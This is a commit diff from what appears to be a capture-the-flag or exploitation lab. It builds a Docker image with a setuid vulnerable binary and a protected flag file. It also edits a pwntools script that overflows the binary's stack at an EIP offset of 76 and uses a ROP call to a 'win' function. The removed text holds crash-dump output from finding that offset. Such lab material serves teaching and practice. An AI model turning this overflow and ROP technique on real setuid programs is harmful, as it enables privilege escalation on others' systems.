having some issues

nkcyber · Nov 13, 2024 · cf9677f · cf9677f
1 parent 8e2af44
commit cf9677f
Show file tree

Hide file tree

Showing 3 changed files with 7 additions and 40 deletions.
diff --git a/Dockerfile b/Dockerfile
@@ -14,13 +14,12 @@ WORKDIR /app
 COPY requirements.txt .
 RUN pip3 install -r requirements.txt
 
-COPY Makefile example.c ./
-
+COPY Makefile example.c attack.py create_table.py flag.txt .
 RUN make
+RUN useradd -ms /bin/bash user
+RUN chmod 400 flag.txt && chmod +s example && chmod o+r /tmp && chown user attack.py && chgrp user attack.py
 
-COPY attack.py create_table.py .
-
-## TODO: do not run this as root
+USER user
 
 CMD ["/bin/sh"]
 
diff --git a/attack.py b/attack.py
@@ -1,39 +1,4 @@
 #!/usr/bin/env python3
-"""
-NOW
-...
-trying i=99
-[+] Starting local process './example': pid 116
-[*] Process './example' stopped with exit code -11 (SIGSEGV) (pid 116)
-[+] Parsing corefile...: Done
-[*] '/tmp/core.example.116'
-    Arch:      i386-32-little
-    EIP:       0x61616174
-    ESP:       0xffffdc50
-    Exe:       '/app/example' (0x56555000)
-    Fault:     0x61616174
-+----------+------------+---------------+-------------+
-| register | hex value  | decimal value | cyclic_find |
-+----------+------------+---------------+-------------+
-| orig_eax | 0xffffffff | 4294967295    | -1          |
-| ecx      | 0xffffdec0 | 4294958784    | -1          |
-| esi      | 0xffffdc90 | 4294958224    | -1          |
-| edx      | 0xffffdc5f | 4294958175    | -1          |
-| esp      | 0xffffdc50 | 4294958160    | -1          |
-| eax      | 0xffffdc00 | 4294958080    | -1          |
-| edi      | 0xf7ffcb80 | 4160736128    | -1          |
-| eip      | 0x61616174 | 1633771892    | 76          |
-| ebp      | 0x61616173 | 1633771891    | 72          |
-| ebx      | 0x61616172 | 1633771890    | 68          |
-| eflags   | 0x10286    | 66182         | -1          |
-| xgs      | 0x63       | 99            | -1          |
-| xds      | 0x2b       | 43            | -1          |
-| xes      | 0x2b       | 43            | -1          |
-| xss      | 0x2b       | 43            | -1          |
-| xcs      | 0x23       | 35            | -1          |
-| xfs      | 0x0        | 0             | -1          |
-+----------+------------+---------------+-------------+
-"""
 
 import sys
 from pwn import *
@@ -49,11 +14,13 @@
 
 # Now, we can create our attack.
 ## --------------
+
 rop = ROP(elf)
 rop.win()
 
 
 offset = 76 # This needs to be the offset for eip
+
 ## --------------
 
 payload = flat({

diff --git a/flag.txt b/flag.txt
@@ -0,0 +1 @@
+flag{example_flag}